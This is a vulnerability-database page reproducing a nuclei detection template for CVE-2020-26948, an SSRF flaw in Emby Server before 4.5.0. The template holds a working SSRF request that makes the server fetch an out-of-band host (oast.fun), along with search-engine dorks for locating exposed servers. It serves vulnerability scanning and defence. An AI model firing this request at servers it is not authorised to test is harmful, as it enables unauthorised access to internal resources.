Lucene search
K

Emby < 4.5.0 - Server Server-Side Request Forgery

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 109 Views

Emby Server SSRF allows access to internal resource

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Server-Side Request Forgery in Emby
22 Jul 202023:30
githubexploit
Circl
CVE-2020-26948
11 Oct 202000:35
circl
CNVD
Emby Server Cross-Site Request Forgery Vulnerability
20 Oct 202000:00
cnvd
CVE
CVE-2020-26948
10 Oct 202020:12
cve
Cvelist
CVE-2020-26948
10 Oct 202020:12
cvelist
Metasploit
Emby SSRF HTTP Scanner
13 Jun 202117:55
metasploit
Metasploit
Emby Version Scanner
13 Jun 202117:55
metasploit
NVD
CVE-2020-26948
10 Oct 202021:15
nvd
OpenVAS
Emby Server < 4.5.0 SSRF Vulnerability
10 Sep 202100:00
openvas
OSV
CVE-2020-26948
10 Oct 202021:15
osv
Rows per page
id: CVE-2020-26948

info:
  name: Emby < 4.5.0 - Server Server-Side Request Forgery
  author: dwisiswant0
  severity: critical
  description: |
    Emby Server before 4.5.0 allows server-side request forgery (SSRF) via the Items/RemoteSearch/Image ImageURL parameter.
  impact: |
    An attacker can exploit this vulnerability to access internal resources, perform port scanning, and potentially pivot to other systems.
  remediation: |
    Apply the latest security patches or upgrade to a patched version of Emby Server.
  reference:
    - https://github.com/btnz-k/emby_ssrf
    - https://github.com/btnz-k/emby_ssrf/blob/master/emby_scan.rb
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Live-Hack-CVE/CVE-2020-26948
    - https://nvd.nist.gov/vuln/detail/CVE-2020-26948
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-26948
    cwe-id: CWE-918
    epss-score: 0.87154
    epss-percentile: 0.99728
    cpe: cpe:2.3:a:emby:emby:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: emby
    product: emby
    shodan-query: http.title:"emby"
    fofa-query: title="emby"
    google-query: intitle:"emby"
  tags: cve2020,cve,emby,jellyfin,ssrf,vuln,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://oast.fun"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<h1> Interactsh Server </h1>"

      - type: word
        part: content_type
        words:
          - "text/html"
          - "application/octet-stream"

      - type: status
        status:
          - 200
# digest: 490a0046304402205c25378e0cddec54e64f8167769cad089c8fd22f1243f34b5bf7dd4a5fbaad5f02206d6488f05a89319de83454f175c6bbb9c30fba30f2c3b8afd56efa20dac6f3c8:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 27.5
CVSS 3.19.8
EPSS0.87154
109